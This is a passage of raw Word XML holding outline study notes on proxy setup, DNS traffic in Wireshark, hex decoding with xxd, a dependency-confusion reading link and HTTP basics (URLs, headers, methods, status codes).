        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Proxy Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061DF46" w14:textId="2B41CEE2" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SOCKS host to 127.0.0.1 and 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA6C60" w14:textId="68684307" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Now using HTTP over DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E05956" w14:textId="18EE0A67" w:rsidR="00512F5B" w:rsidRDefault="00512F5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B10E4" w14:textId="77777777" w:rsidR="00512F5B" w:rsidRDefault="00512F5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard Queries with A and AAAA – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11CB09" w14:textId="1DE3FAA9" w:rsidR="00512F5B" w:rsidRDefault="00512F5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>take alphanumeric string and echo it in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798D51A3" w14:textId="6800FC16" w:rsidR="00512F5B" w:rsidRDefault="00512F5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">43616e64792043616e652053657269616c204e756d6265722038343931 </w:t>
      </w:r>
      <w:r>
        <w:t>| xxd -r -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C94A32" w14:textId="69CA8AEC" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A407EBE" w14:textId="33E8AE12" w:rsidR="00773362" w:rsidRPr="004D2C9D" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId225" w:history="1">
        <w:r w:rsidR="00773362" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="006AC78D" w14:textId="236C4591" w:rsidR="004D2C9D" w:rsidRDefault="004D2C9D" w:rsidP="004D2C9D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB59842" w14:textId="3E66492C" w:rsidR="004D2C9D" w:rsidRDefault="004D2C9D" w:rsidP="004D2C9D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP in Detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D194A0" w14:textId="77777777" w:rsidR="00794260" w:rsidRDefault="00794260" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
        <w:t>What is HTTP(S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705B9A7" w14:textId="0BFB7559" w:rsidR="004D2C9D" w:rsidRDefault="00794260" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
        <w:t>HTTP is the set of rules used for communicating with web servers for the transmitting of webpage data, whether that is HTML, Images, Videos, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F3C87" w14:textId="66DEC6C2" w:rsidR="00794260" w:rsidRDefault="00794260" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Requests and Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C0148" w14:textId="56F25868" w:rsidR="00794260" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3667B2" w14:textId="027B8620" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scheme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D532B8" w14:textId="6A53AC08" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7B488" w14:textId="26FB9662" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC50186" w14:textId="568AB65D" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>user:password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBB456" w14:textId="2282F902" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159798CC" w14:textId="6A030191" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8CFDD" w14:textId="106008E5" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41FE46" w14:textId="6189D271" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FAAEF" w14:textId="7F5B1296" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E50704" w14:textId="0D3A7E43" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/stuff-stuff/stuff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52094121" w14:textId="180A77D4" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>querystring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3CF4A" w14:textId="2A909EF2" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D97420" w14:textId="75351922" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>fragment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111234AD" w14:textId="21AB25E4" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#&lt;morestuff&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD956F2" w14:textId="01DB44A1" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Making a Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E47ED2" w14:textId="1F2FF628" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET/page/HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2A29D" w14:textId="0E033014" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Request Method/Page/Protocol/Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58370C" w14:textId="123124A0" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Example Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256D9E2" w14:textId="48505F47" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63F2B2" w14:textId="3358640E" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61033012" w14:textId="7FEBDB6D" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>web server desired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D6B8B" w14:textId="164DEBFF" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466351CE" w14:textId="10D336FF" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>browser and version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B853F57" w14:textId="11F18DCF" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA0860" w14:textId="66232556" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>what referred user to requested page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C3D10" w14:textId="063A7E3F" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Example Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09F575" w14:textId="5199EA12" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Protocol Version and Status Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5A8C1" w14:textId="7A8ECFAD" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2121D" w14:textId="3C9AEC6C" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>software and version number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6CC766" w14:textId="731475B1" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F3FBF6" w14:textId="7D09BD78" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>date, time, timezone of web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B69582" w14:textId="76014E77" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C1541" w14:textId="3025C35F" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>what sort of information is going to be sent, HTML, images, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C4EAF4" w14:textId="687BAA0F" w:rsidR="00ED569C" w:rsidRDefault="00ED569C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37E3AE" w14:textId="12803718" w:rsidR="00ED569C" w:rsidRDefault="00FC6353" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>how long the response is to confirm no data is missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE5102" w14:textId="1CA386AE" w:rsidR="00FC6353" w:rsidRDefault="00FC6353" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48727B5B" w14:textId="2FA3E102" w:rsidR="00FC6353" w:rsidRDefault="00FC6353" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBDFF8" w14:textId="751252C7" w:rsidR="00FC6353" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE89FD" w14:textId="27B267BE" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for getting information from a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242A61D" w14:textId="399A29B2" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3E601D" w14:textId="539E32E0" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for submitting data to the web server and potentially creating new records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77128BEB" w14:textId="618DC3A0" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696B4EF" w14:textId="0C8445D3" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for submitting data to a web server to update information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49776A52" w14:textId="37B356CE" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761600A3" w14:textId="4CCC1019" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for deleting information/records from a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9275F5" w14:textId="3D30BED9" w:rsidR="001556FF" w:rsidRDefault="001556FF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Status Codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12166A25" w14:textId="40B847BF" w:rsidR="001556FF" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>100-199 – information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A55E5" w14:textId="1D2B7221" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>200-299 – success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1A2EE" w14:textId="208BDEF2" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>300-399 – redirection</w:t>
      </w:r>
    </w:p>
